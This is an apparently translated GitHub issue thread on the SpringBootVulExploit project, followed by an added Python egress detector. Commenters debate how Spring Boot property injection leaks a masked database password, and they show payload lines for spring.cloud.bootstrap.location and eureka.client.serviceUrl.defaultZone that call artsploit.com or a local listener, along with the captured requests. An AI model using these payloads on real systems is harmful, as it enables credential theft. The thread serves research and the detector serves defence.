Comments (3)
A correction:
- The source isn't content from the article you cited. Using
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
to steal the password simply can't be reproduced; there's good reason to suspect it doesn't work at all, and the author neither tested it nor traced the source code.
- You can trace the password-stealing flow for
eureka.client.serviceUrl.defaultZone
yourself: it hooks into Eureka's authentication flow, which is why the password can be carried out.
from springbootvulexploit.
OK, thanks for the correction.
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
This indeed can't carry the password out in the auth header; Spring Boot ignores it there. But the following form works:
spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml
Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
This one,
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000
is a technique I also found by chance while digging into Eureka in March last year. The overall idea is still to have Spring fill in the placeholder with the asterisk-masked field, so that the data is carried out.
Choosing the auth header was also a coincidence: at the time I saw that the url_path Eureka requests was /apps/, so I assumed it couldn't be passed in the url_path. I also thought about the case where the HTTP request can't get out, and even about passing it via dnslog.
I just tried it, and it can indeed be passed in the url_path as well:
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123
Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=
As for spring.cloud.bootstrap.location: when I was writing the article this year I saw that this point could get RCE, and since it is also an HTTP request I extended it without getting around to testing it. That was indeed not rigorous enough; I will correct this point in the article.
from springbootvulexploit.
Learned something. Indeed, while the target makes an outbound HTTP request, placeholders in the URL path can be used to carry data out.
from springbootvulexploit.
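From the defender's side, the two captures above show the same leak through two channels: a resolved placeholder in the request path (HEAD /123456.yml) and one in the Basic credentials (MTIzNDU2Om51bGw= decodes to 123456:null). The following is an added detection example, not code from the SpringBootVulExploit project or from any commenter; it assumes an egress proxy or listener hands you the raw request text, and the secret value and the two sample requests are constructed to mirror the thread's captures.

```python
import base64
import binascii
from typing import Dict, List, Optional, Tuple

# Constructed: the value the ${somedb.password} placeholder resolved to in the thread.
SECRETS: Dict[str, str] = {"somedb.password": "123456"}

# Constructed egress captures modelled on the two requests shown in the thread.
REQ_PATH_LEAK = """HEAD /123456.yml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Java/1.8.0_201
"""
REQ_AUTH_LEAK = """GET /123123/apps/ HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=
"""

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def decode_basic(auth_value: str) -> Optional[str]:
    """Return 'user:pass' from an HTTP Basic Authorization value, else None."""
    scheme, _, token = auth_value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def find_leaks(raw_request: str, secrets: Dict[str, str]) -> List[str]:
    """Report every secret that appears in the URL path or in Basic credentials."""
    _method, path, headers = parse_request(raw_request)
    creds = decode_basic(headers.get("authorization", ""))
    findings: List[str] = []
    for name, value in secrets.items():
        if value and value in path:
            findings.append(f"{name} in url path")
        if value and creds is not None and value in creds:
            findings.append(f"{name} in basic auth header")
    return findings
```

In a real deployment the secret values would come from the application's own secret source at egress-inspection time, and a hit on either channel is a strong signal that a URL-typed property such as the two discussed here has been rewritten to contain a placeholder.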